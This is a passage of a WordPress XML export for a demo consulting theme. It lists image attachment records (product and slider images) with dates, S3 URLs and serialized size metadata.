		<pubDate>Mon, 05 Oct 2020 10:12:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-4.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1275</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:12:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:12:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-4.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-4.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:21:"2020/10/product-4.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:21:"product-4-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"product-4-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"product-4-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/product-5/</link>
		<pubDate>Mon, 05 Oct 2020 10:12:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-5.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1276</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:12:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:12:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-5.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-5.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:21:"2020/10/product-5.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:21:"product-5-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"product-5-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"product-5-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/product-6/</link>
		<pubDate>Mon, 05 Oct 2020 10:13:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-6.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1277</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:13:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:13:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-6.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-6.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:21:"2020/10/product-6.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:21:"product-6-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"product-6-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"product-6-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-7</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/product-7/</link>
		<pubDate>Mon, 05 Oct 2020 10:15:10 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-7.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1279</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:15:10]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:15:10]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-7]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-7.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-7.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:21:"2020/10/product-7.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:21:"product-7-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"product-7-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"product-7-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-8</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/product-8/</link>
		<pubDate>Mon, 05 Oct 2020 10:15:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-8.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1280</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:15:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:15:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-8]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-8.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-8.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:21:"2020/10/product-8.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:21:"product-8-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"product-8-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"product-8-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-9</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/product-9/</link>
		<pubDate>Mon, 05 Oct 2020 10:15:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-9.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1281</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:15:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:15:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-9]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-9.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-9.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:21:"2020/10/product-9.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:21:"product-9-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"product-9-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"product-9-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slider1-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/slider1-home2/</link>
		<pubDate>Thu, 15 Oct 2020 08:40:56 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slider1-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1307</wp:post_id>
		<wp:post_date><![CDATA[2020-10-15 08:40:56]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-15 08:40:56]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slider1-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slider1-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/slider1-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:781;s:4:"file";s:25:"2020/10/slider1-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"slider1-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"slider1-home2-1024x417.jpg";s:5:"width";i:1024;s:6:"height";i:417;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"slider1-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"slider1-home2-768x312.jpg";s:5:"width";i:768;s:6:"height";i:312;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"slider1-home2-1536x625.jpg";s:5:"width";i:1536;s:6:"height";i:625;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"slider1-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"slider1-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"slider1-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"slider1-home2-1200x781.jpg";s:5:"width";i:1200;s:6:"height";i:781;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slider2-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/slider2-home2/</link>
		<pubDate>Fri, 16 Oct 2020 08:22:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slider2-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1317</wp:post_id>
		<wp:post_date><![CDATA[2020-10-16 08:22:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-16 08:22:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slider2-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slider2-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/slider2-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:781;s:4:"file";s:25:"2020/10/slider2-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"slider2-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"slider2-home2-1024x417.jpg";s:5:"width";i:1024;s:6:"height";i:417;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"slider2-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"slider2-home2-768x312.jpg";s:5:"width";i:768;s:6:"height";i:312;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"slider2-home2-1536x625.jpg";s:5:"width";i:1536;s:6:"height";i:625;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"slider2-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"slider2-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"slider2-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"slider2-home2-1200x781.jpg";s:5:"width";i:1200;s:6:"height";i:781;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slider3-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/slider3-home2/</link>
		<pubDate>Fri, 16 Oct 2020 08:27:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slider3-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1318</wp:post_id>
		<wp:post_date><![CDATA[2020-10-16 08:27:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-16 08:27:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slider3-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slider3-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/slider3-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:781;s:4:"file";s:25:"2020/10/slider3-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"slider3-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"slider3-home2-1024x417.jpg";s:5:"width";i:1024;s:6:"height";i:417;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"slider3-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"slider3-home2-768x312.jpg";s:5:"width";i:768;s:6:"height";i:312;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"slider3-home2-1536x625.jpg";s:5:"width";i:1536;s:6:"height";i:625;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"slider3-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"slider3-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"slider3-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"slider3-home2-1200x781.jpg";s:5:"width";i:1200;s:6:"height";i:781;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/home/bg1-home2/</link>
		<pubDate>Tue, 20 Oct 2020 09:58:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1372</wp:post_id>
		<wp:post_date><![CDATA[2020-10-20 09:58:40]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-20 09:58:40]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg1-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
